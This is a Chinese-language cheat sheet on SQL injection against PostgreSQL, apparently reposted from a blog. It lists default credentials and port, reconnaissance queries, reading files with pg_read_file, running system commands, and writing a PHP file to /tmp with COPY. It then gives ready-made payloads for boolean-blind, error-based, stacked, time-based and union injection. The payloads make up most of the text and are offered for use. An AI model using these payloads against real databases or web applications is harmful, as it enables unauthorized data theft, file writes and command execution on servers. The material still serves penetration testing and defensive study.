目錄

PostgreSQL

PostgreSQL常用查詢命令

布爾盲注

錯誤注入

堆疊注入

時間盲注

聯合查詢

---

PostgreSQL

PostgreSQL是一種特性非常齊全的自由軟件的對象-關系型數據庫管理系統（ORDBMS），4.2版本為基礎的對象關系型數據庫管理系統。

PostgreSQL安裝后，默認的端口是：5432，默認的用戶名是： postgres ，默認的數據庫也是：postgres 。注釋符：--? ? ? ? ? ? ? 延時函數：pg_sleep(3)

PostgreSQL和MySQL一樣，也有?information_schema?數據庫。

PostgreSQL安裝后默認是不允許其他主機連接的，如果要讓其他主機連接，找到PostgreSQL安裝目錄下的/data/pg_hba.conf，?找到“# IPv4 local connections:”，然后在下面添加你的IP地址

host all all 192.168.10.1/32 md5

PostgreSQL常用查詢命令

select CURRENT_SCHEMA() #查看當前權限

select user #查看用戶

select current_user #查看當前用戶

select chr(97) #將ASCII碼轉為字符

select chr(97)||chr(100)||chr(109)||chr(105)||chr(110) #將ASCII轉換為字符串

SELECT session_user;

SELECT usename FROM pg_user;

SELECT getpgusername();

select version() #查看PostgreSQL數據庫版本

SELECT current_database() #查看當前數據庫

select length('admin') #查看長度

select case when(expr1) then result1 else result2 end; #如果xx，執行result1，否則result2

例：select case when(current_user='postgres') then pg_sleep(5) else pg_sleep(0) end;

select pg_read_file(filepath+filename); #讀取文件

select system("comamnd_string"); #執行系統命令

COPY (select '<?php phpinfo();?>') to '/tmp/1.php'; #寫入文件

布爾盲注

1 AND ASCII(SUBSTRING((SELECT COALESCE(CAST(COUNT(DISTINCT(schemaname)) AS CHARACTER(10000)),(CHR(32))) FROM pg_tables)::text FROM 1 FOR 1))>48

?

錯誤注入

報錯注入需要目標網站開啟了報錯提示。

1 AND 2518=CAST((CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))||(SELECT COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32))) FROM pg_tables OFFSET 0 LIMIT 1)::text||(CHR(113)||CHR(112)||CHR(106)||CHR(98)||CHR(113)) AS NUMERIC)

?

堆疊注入

和MySQL的堆疊注入一樣，在后面加上查詢語句即可。

時間盲注

select pg_sleep(3)

聯合查詢

order by 3 #查看顯示列

select null,null,函數

然后接下來就是和MySQL注入一樣了，關于PostgreSQL的語句可以查看SQLMap

更多語句查看SQLMap

總結

以上是生活随笔為你收集整理的PostgreSQL数据库的注入的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。